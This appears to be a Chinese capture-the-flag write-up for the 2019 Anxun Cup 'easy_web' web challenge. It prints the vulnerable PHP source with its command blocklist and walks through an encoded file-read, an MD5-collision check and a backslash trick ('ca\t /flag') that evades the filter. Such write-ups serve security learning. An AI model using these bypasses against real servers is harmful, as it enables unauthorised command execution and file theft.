[安洵杯 2019]easy_web

[安洵杯 2019]easy_web

开启环境之后是这样的

 

 url是这样的：http://xxx/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=

看到cmd可以猜测是命令执行漏洞，简单测试了两个命令发现在黑名单内

 

 将注意力转移到img上，进行解密

加密方式是：hex->base64->base64

我们解密 base64->base64->hex，解码后为555.png

 

 

猜测有文件包含漏洞，用同样的加密方式尝试包含index.php，查看过滤的黑名单

将index.php编码为TmprMlpUWTBOalUzT0RKbE56QTJPRGN3放入img参数中，获得了index.php的base64编码后的结果，为：

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi～ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

　　可以看到在此处过滤了img解码后包含大小写flag的情况，防止我们直接使用文件包含获取flag

if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
}

　　这里是我们第一个要突破的地方，可以看到是对输入的cmd进行了过滤，我们需要一个能够读取文件的命令

接着是这里

if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }

　　md5碰撞，让a,b两个值不相等而md5值相等，因为$cmd使用了` `反引号包裹，所以最后是返回cmd的执行结果。

也就是说我们需要突破命令的黑名单过滤和md5碰撞

关于md5碰撞可以参考这篇文章，自制值相同而md5不相同的数据：https://xz.aliyun.com/t/2232

这里我得到的是：

 

 将测试语句加上

if($_POST['param1']!==$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
    die("success!");
}

　　

 

 可以看到返回值中有success!，证明我们碰撞成功了，这也会是我们做这道题所会用到的两个值。

然后是命令过滤突破，观察黑名单列表

先使用cmd=dir%20/查看根目录下的文件

 

 可以看到flag，接下来就是fuzz linux下能够读取文件的命令

这里的：

 

 使用了两个反斜杠和四个反斜杠来过滤，但正则表达式中需要三个反斜杠才可以匹配到一个真正的反斜杠，所以实际上反斜杠没有被过滤。而在linux命令中可以添加反斜杠来绕过黑名单过滤。

所以有

cmd=ca\t%20/flag

 

 也可以使用linux下的sort命令来进行文件读取

Linux sort命令用于将文本文件内容加以排序。sort可针对文本文件的内容，以行为单位来排序。

其作用为：

 

 当然也可以用来读取flag文件。

 

 以上

 

 

参考链接：

https://blog.csdn.net/qq_19980431/article/details/83018232

https://xz.aliyun.com/t/2232

https://nikoeurus.github.io/2019/11/30/2019%E5%AE%89%E8%AF%A2%E6%9D%AF-Web/#easy-web

https://www.cnblogs.com/wangtanzhi/p/12244096.html

https://xz.aliyun.com/t/6911